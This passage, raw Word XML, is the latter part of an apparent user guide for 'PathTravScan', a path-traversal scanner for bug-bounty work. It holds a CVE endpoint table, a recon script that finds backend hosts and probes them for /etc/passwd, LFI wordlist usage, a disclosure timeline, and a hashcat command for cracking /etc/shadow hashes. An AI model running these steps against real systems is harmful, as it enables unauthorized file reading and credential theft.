        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2021-44515</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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/servlet/OPMAdminServlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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VMware vCenter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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CVE-2021-22005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">/analytics/telemetry</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A5276" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Operational Security &amp; Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1  Automating Backend IP Discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Combine PathTravScan with standard recon tools for a full automated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#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># automated_scan.sh — Full LFI recon pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TARGET=$1</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echo '[*] Step 1: Subdomain enumeration'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">subfinder -d $TARGET -silent -o /tmp/subs.txt</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echo '[*] Step 2: Resolve and probe alive hosts'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cat /tmp/subs.txt | httpx -silent -ip -status-code -o /tmp/alive.txt</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echo '[*] Step 3: Find non-CDN IPs (potential backends)'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MAIN_IP=$(dig +short $TARGET | head -1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">grep -v "$MAIN_IP" /tmp/alive.txt &gt; /tmp/backends.txt</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echo '[*] Step 4: Run PathTravScan against each backend'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">while read entry; do</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  url=$(echo $entry | cut -d' ' -f1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  echo "[*] Scanning: $url"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  source .venv/bin/activate</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  python pathtravscan.py -u "$url" -p "/" \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    --mode quick -f /etc/passwd \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    -o "reports/$(echo $url | sed 's|https\?://||').json"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">done &lt; /tmp/backends.txt</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5.2  Using SecLists with PathTravScan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SecLists is the most comprehensive wordlist collection for LFI. Combine it with PathTravScan for maximum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 Clone SecLists (do this once)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">git clone https://github.com/danielmiessler/SecLists.git ~/SecLists</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Use the LFI wordlist</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u https://target.com \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -p /app/images \</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --wordlist ~/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt</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 Also try:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># ~/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># ~/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt</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5.3  Responsible Disclosure Timeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1C2833"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow this timeline for responsible disclosure after finding a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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="756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180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Day 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="756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Found the vulnerability. Stop testing. Do NOT exfiltrate more data than needed for PoC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Day 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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Submit report via HackerOne / Bugcrowd / vendor security email with full PoC.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Day 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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Follow up if no acknowledgement. Be polite — security teams are often understaffed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Day 30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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Check if patch is in progress. Offer help if asked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Day 90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="75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If no patch and no communication, consider publishing an advisory (with proof of outreach).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1800"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAFAF1"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After fix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7560"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EAFAF1"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Verify the fix works. Request bounty if not already paid. Write a blog post (great for reputation!).</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5.4  Tools That Pair Well with PathTravScan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7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9"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to Use With PathTravScan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Use --proxy http://127.0.0.1:8080. Full request history, can modify+replay findings.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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subfinder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Find all subdomains → pipe to httpx → identify backend IPs for PathTravScan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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httpx</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Probe discovered IPs for live HTTP services before scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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shodan-cli</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Search for backend IPs: shodan search hostname:target.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="71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Run after PathTravScan to check for other known CVEs on the same target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>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If you get /etc/shadow, crack hashes offline: hashcat -m 1800 shadow.txt rockyou.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="220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ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7160"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="EBF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuzz endpoint paths to discover additional vulnerable endpoints before scanning.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5  Quick Reference — All PathTravScan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BB2B9" w:sz="1"/>
              <w:left w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:bottom w:val="single" w:color="ABB2B9" w:sz="1"/>
              <w:right w:val="single" w:color="ABB2B9" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1E2A3A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python pathtravscan.py [OPTIONS]</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Target:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -u, --url URL          Target base URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -p, --path PATH        Vulnerable endpoint path</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -f, --file FILE        Target file (default: /etc/passwd)</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Payloads:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --mode quick|full      quick=15 payloads, full=300+ payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --wordlist FILE        Custom wordlist path</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Performance:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --threads N            Concurrent threads (default: 1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --delay SECS           Delay between requests (default: 0)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --timeout SECS         Request timeout (default: 10)</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Network:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --proxy URL            Proxy URL (Burp: http://127.0.0.1:8080)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --no-legacy-tls        Disable TLS 1.0 support</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Behaviour:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --stop-on-first        Stop after first confirmed finding</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  --show-all             Show all results in table (not just findings)</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Output:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  -o, --output FILE      JSON report path</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="20"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00CC99"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Subcommands:</w:t>
            </w:r>
